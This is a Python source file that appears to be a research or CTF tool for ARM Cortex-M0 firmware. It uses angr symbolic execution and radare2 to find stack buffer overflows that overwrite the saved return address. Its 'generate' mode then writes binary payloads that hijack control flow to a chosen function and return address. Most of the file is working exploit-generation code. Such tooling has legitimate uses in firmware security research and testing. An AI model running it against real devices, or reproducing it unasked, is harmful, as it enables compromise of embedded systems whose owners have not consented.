m0-angr.py 10.8 KB
from utils import *
import restore

import angr
import claripy
import logging
import z3
import struct
import sys
import click

API_PATH    = 'api.txt'
CFG_PATH    = 'cfg.txt'
VULN_PATH   = 'vuln.txt'

HEURISTICS_FIND_CANDIDATE        = int(1e3)
HEURISTICS_VALIDATE_CANDIDATE    = int(1e5)

GLOBAL_TABLE = {
    'ep_offset':    0x00000004,
    'global_start': 0x20000000,
    'global_size':  0x00001000,
    'stack_top':    0x20002000,
    'stack_size':   0x00001000,
    'dma_start':    0x50000000,
    'dma_size':     0x00001000
}

class M0Analyzer:
    def __init__(self, binPath):
        self.binPath = binPath
        self.bin = loadBinary(binPath)
        self.__loadAngrAndCfg()
        logging.getLogger('angr').propagate = False
        logging.getLogger('angr').setLevel('CRITICAL')

    def analyze(self, limit1=HEURISTICS_FIND_CANDIDATE, limit2=HEURISTICS_VALIDATE_CANDIDATE):
        self.limit1 = limit1
        self.limit2 = limit2
        self.__loadAngrAndCfg()
        self.__loadAPI()
        self.__extractCfg()
        self.__extractAPIList()
        self.__analyze()

    def read32(self, o):
        return struct.unpack('<L', self.bin[o:o+4])[0]

    def get_entry_offset(self):
        return self.read32(GLOBAL_TABLE['ep_offset']) & (~1)

    def generate_payload(self, out_path, code_offset, destination_offset, return_offset):
        with open(VULN_PATH, 'rt') as f:
            for line in f.readlines():
                line = line.strip('\r\n ')
                tokens = line.split('\t')
                if len(tokens) != 3:
                    continue
                type, offset, payload = tokens[0], int(tokens[1], 16), tokens[2]
                if offset == code_offset:
                    found = (offset, payload)
                    break
            if found == None:
                return False
        with open(out_path, 'wb') as f:
            def write_u8(v):
                f.write(bytes([v]))
            def write_u32(v):
                for _ in range(4): # little-endian
                    write_u8(v & 0xff)
                    v >>= 8
            for v in payload.split(','):
                if v == '[offset]':
                    write_u32(destination_offset + 2 + 1) # skip its first push instruction
                else:
                    write_u8(int(v, 16))
            opcode, operand = getInst(self.p.factory.block(destination_offset+1))
            assert opcode.find('push') != -1 # only support calling a function with prologue
            lr_offset = (len(operand.split(',')) - 1) * 4
            for _ in range(lr_offset):
                write_u8(0x00)
            write_u32(return_offset+1)
        return True

    def __loadAngrAndCfg(self):
        ep = self.get_entry_offset()
        main_opts = {'backend': 'blob', 'arch': 'arm', 'base_addr':0, 'entry_point': ep+1}
        self.p = p = angr.Project(self.binPath, main_opts=main_opts, use_sim_procedures=True)
        self.cfg = cfg = p.analyses.CFGFast(force_complete_scan=False, function_starts=[ep+1])
        cfg.normalize()

    def __loadAPI(self):
        self.l = l = restore.RestoreAPI(self.binPath, self.cfg.functions.keys()).restore()
        p = self.p
        class HookReturn(angr.SimProcedure):
            def run(self, return_value=None):
                if return_value == None:
                    return
                if return_value == 'no_return':
                    ret = None
                elif return_value == 'return_sym':
                    ret = claripy.BVS('sym', 4*8)
                elif return_value == 'return_zero':
                    ret = 0x0
                elif return_value == 'return_one':
                    ret = 0x1
                elif return_value == 'on_read':
                    ret = claripy.BVS('read', 1*8)
                    self.state.globals['on_read_history'].append({
                        'addr': self.state.addr,
                        'bvs':  ret
                    })
                return ret
        for offset in l:
            type = l[offset]['type']
            if type not in ['no_return', 'return_sym', 'return_zero', 'return_one', 'on_read']:
                raise Exception('Invalid type: ' + type)
            # note that angr uses odd offsets in thumb-mode.
            p.hook(offset+1, HookReturn(return_value=type))
        print('[+] loaded APIs')
        self.__findMain()

    def __findMain(self):
        # where is our init function?
        init_offset = None
        for offset in self.l:
            v = self.l[offset]
            if v['name'] == 'init':
                init_offset = offset
                break
        assert init_offset != None # assume that init func has been found
        # find its caller
        r = getRadareHandlerByOffsetList(self.binPath, self.cfg.functions.keys())
        r.cmd('s %d' % init_offset)
        caller_map = json.loads(r.cmd('agCj'))
        caller_offset = None
        for v in caller_map:
            for callee in v['imports']:
                if callee == 'fcn.%08x' % init_offset:
                    caller_offset = int(v['name'].split('.')[1], 16)
                    break
        assert caller_offset != None
        self.main_offset = caller_offset
        self.l[caller_offset] = { 'name': 'main' }

    def __extractCfg(self):
        r = getRadareHandlerByOffsetList(self.binPath, self.cfg.functions.keys())
        for o in self.l:
            v = self.l[o]
            n = v['name']
            r.cmd('s %d' % o)
            r.cmd('afn %s' % n)
        r.cmd('pdf @@fcn > %s' % CFG_PATH)
        print('[+] extracted cfg')

    def __extractAPIList(self):
        with open(API_PATH, 'wt') as f:
            l = sorted(self.l.items())
            for v in l:
                k, v = v
                f.write('%08x\t%s\n' % (k, v['name']))
        print('[+] extracted api list')

    def __analyze(self):
        print('[*] find candidates')
        sim = self.p.factory.simgr(self.__generate_state(offset=self.get_entry_offset()))
        sim.use_technique(angr.exploration_techniques.DFS())
        candidates = {}
        step_count = 0
        while len(sim.active) > 0:
            sim.step()
            for state in sim.active:
                target_offset = state.callstack.func_addr
                return_offset = state.callstack.ret_addr
                if len(state.globals['on_read_history']) == 0:
                    continue
                addr_ = state.globals['on_read_history'][-1]['addr']
                if addr_ in candidates:
                    continue
                print('[*] found a candidate')
                candidate = {
                    'state':         state.copy(),
                    'target_offset': target_offset,
                    'return_offset': return_offset
                }
                candidates[addr_] = candidate
                self.__test_candidate(candidate)
            step_count += 1
            if step_count >= self.limit1:
                break
        print('[+] analyzed all')
        return candidates

    def __test_candidate(self, candidate):
        sim = self.p.factory.simgr(candidate['state'])
        sim.use_technique(angr.exploration_techniques.DFS())
        sim.explore(n=self.limit2, avoid=lambda s: (s.callstack.func_addr&(~1))==self.main_offset)

    def __generate_state(self, offset):
        state = self.p.factory.entry_state(addr=offset + 1)
        state.regs.r13 = state.callstack.stack_ptr = GLOBAL_TABLE['stack_top']
        state.globals['start_ptr_map'] = {}
        state.globals['on_read_history'] = []
        state.globals['has_appeared'] = {}
        def cb_before_write(state): # detect BOF
            if not state.inspect.instruction:
                return
            dest = state.solver.eval(state.inspect.mem_write_address)
            pc = state.solver.eval(state.regs.pc)
            if dest >= GLOBAL_TABLE['stack_top']-GLOBAL_TABLE['stack_size'] and dest <= GLOBAL_TABLE['stack_top']:
                opcode, operand = getInst(self.p.factory.block(pc))
                excepts=['push', 'sub']
                for key in excepts:
                    if opcode.find(key) != -1:
                        return
                if state.callstack.stack_ptr == -1:
                    lr_ptr = GLOBAL_TABLE['stack_top'] - 4
                else:
                    lr_ptr = state.callstack.stack_ptr - 4
                if pc not in state.globals['start_ptr_map']:
                    state.globals['start_ptr_map'][pc] = dest
                if dest >= lr_ptr and dest < lr_ptr + 4:
                    if state.addr in state.globals['has_appeared']:
                        return
                    else:
                        state.globals['has_appeared'][state.addr] = True
                    payload = []
                    history = state.globals['on_read_history']
                    for v in history[:-1]: # except the last element
                        payload.append(state.solver.eval(v['bvs']))
                    self.__write_vuln_info({
                        'type':     'bof',
                        'addr':     state.addr,
                        'payload':  payload
                    })
        def cb_before_read(state): # simulate memory-mapped io
            if not state.inspect.instruction:
                return
            dest = state.solver.eval(state.inspect.mem_read_address)
            if dest >= GLOBAL_TABLE['dma_start'] and dest < GLOBAL_TABLE['dma_start'] + GLOBAL_TABLE['dma_size']:
                state.memory.store(dest, claripy.BVS(str(dest), 4*8)) # at most 32bits
        state.inspect.b('mem_write', when=angr.BP_BEFORE, action=cb_before_write)
        state.inspect.b('mem_read',  when=angr.BP_BEFORE, action=cb_before_read)
        return state

    def __write_vuln_info(self, info):
        with open(VULN_PATH, 'a') as f:
            type    = info['type']
            addr    = '%08x' % (info['addr'] & (~1))
            payload = ','.join(list(map(lambda v: '%02x' % v, info['payload']))) + ',' + '[offset]'
            s = f'{type}\t{addr}\t{payload}\n'
            f.write(s)
            print('[*] found a vuln:', s)

@click.command()
@click.option('--type',   required=True)
@click.option('--name',   required=True)
@click.option('--limit1', required=False, default=HEURISTICS_FIND_CANDIDATE)
@click.option('--limit2', required=False, default=HEURISTICS_VALIDATE_CANDIDATE)
@click.option('--out',    required=False, default='')
@click.option('--code',   required=False, default='')
@click.option('--dest',   required=False, default='')
@click.option('--ret',    required=False, default='0')
def main(type, name, limit1, limit2, out, code, dest, ret):
    analyzer = M0Analyzer(name)
    assert type == 'a' or type == 'g'
    if type == 'a': # analyze
        analyzer.analyze(limit1, limit2)
    elif type == 'g': # generate
        analyzer.generate_payload(out, int(code, 16), int(dest, 16), int(ret, 16))
    print('[+] done')
    exit(0)

if __name__ == "__main__":
    main()